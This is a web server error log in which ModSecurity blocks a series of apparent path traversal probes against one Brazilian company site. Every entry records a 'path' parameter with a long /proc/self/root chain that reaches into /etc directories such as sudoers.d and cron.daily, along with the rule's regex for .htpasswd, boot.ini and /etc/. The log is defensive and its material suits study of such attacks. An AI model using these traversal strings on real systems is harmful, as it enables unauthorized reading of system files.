[Fri Mar 20 05:08:47.956628 2026] [:error] [pid 7893:tid 140411624429312] [client 74.7.241.31:45494] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0AjxCii7xarUs8iHZEpgAAAg4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:08:49.310936 2026] [:error] [pid 7235:tid 140411632822016] [client 74.7.241.31:45500] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0AkfqxLDW4GITHUkTA0gAAAQ0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:08:50.091064 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.243.128:59500] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0AkuoXxyEfFpUF8f9ggAAAAUc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:08:52.575758 2026] [mime_magic:error] [pid 21219:tid 140411649607424] (70014)End of file found: [client 74.7.243.128:41910] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/sys
[Fri Mar 20 05:08:52.686074 2026] [:error] [pid 7235:tid 140411683178240] [client 74.7.241.31:45510] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0AlPqxLDW4GITHUkTA2QAAAQc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:08:53.941416 2026] [:error] [pid 11642:tid 140411658000128] [client 74.7.241.31:45520] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Albninkcc-iUj5Ao8xwAAA4o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:08:58.847247 2026] [:error] [pid 11642:tid 140411641214720] [client 74.7.241.31:45524] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Amrninkcc-iUj5Ao8ywAAA4w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:09:00.933566 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.243.128:41924] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0AnOoXxyEfFpUF8f9giwAAAUA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:09:07.951168 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.241.31:34428] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Ao9a6ubjKNq_cu4avrAAAA1E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:09:11.211640 2026] [:error] [pid 7235:tid 140411565680384] [client 74.7.243.128:37480] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Ap_qxLDW4GITHUkTA6wAAARU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 05:09:14.708283 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.241.31:44236] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Aqta6ubjKNq_cu4avvAAAA04"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:09:15.987164 2026] [:error] [pid 11167:tid 140411616036608] [client 74.7.241.31:44246] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Aq_HIg5MgXLBnicPYiQAAAc8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:09:17.817101 2026] [:error] [pid 10189:tid 140411658000128] [client 74.7.241.31:38118] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0ArTJ3M9BSuKP7CAbw6QAAAIo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:09:23.609203 2026] [:error] [pid 31215:tid 140411674785536] [client 74.7.241.31:38124] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0AswF0L0L-SsrnPo5G1QAAAsg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:09:25.992485 2026] [:error] [pid 11167:tid 140411658000128] [client 74.7.241.31:38132] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0AtfHIg5MgXLBnicPYjwAAAco"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:09:27.382657 2026] [:error] [pid 21219:tid 140411548894976] [client 74.7.241.31:32894] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0At_XLqtnMIWvjpaJ4SQAAApc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:09:29.844335 2026] [:error] [pid 31215:tid 140411666392832] [client 74.7.241.31:32902] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0AuQF0L0L-SsrnPo5G2AAAAsk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:09:32.823919 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.243.128:37182] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0AvNa6ubjKNq_cu4av1gAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:09:32.888970 2026] [:error] [pid 9818:tid 140411699963648] [client 74.7.241.31:32910] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0AvF1pVZ5mVmJwsFMOHwAAAEU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:09:36.458758 2026] [:error] [pid 10189:tid 140411616036608] [client 74.7.243.128:32944] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0AwDJ3M9BSuKP7CAbxAAAAAI8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:10:00.275607 2026] [:error] [pid 11642:tid 140411632822016] [client 74.7.241.31:32914] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0A2Lninkcc-iUj5Ao9DQAAA40"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:10:03.803218 2026] [:error] [pid 11167:tid 140411624429312] [client 74.7.241.31:34204] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0A2_HIg5MgXLBnicPYpAAAAc4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
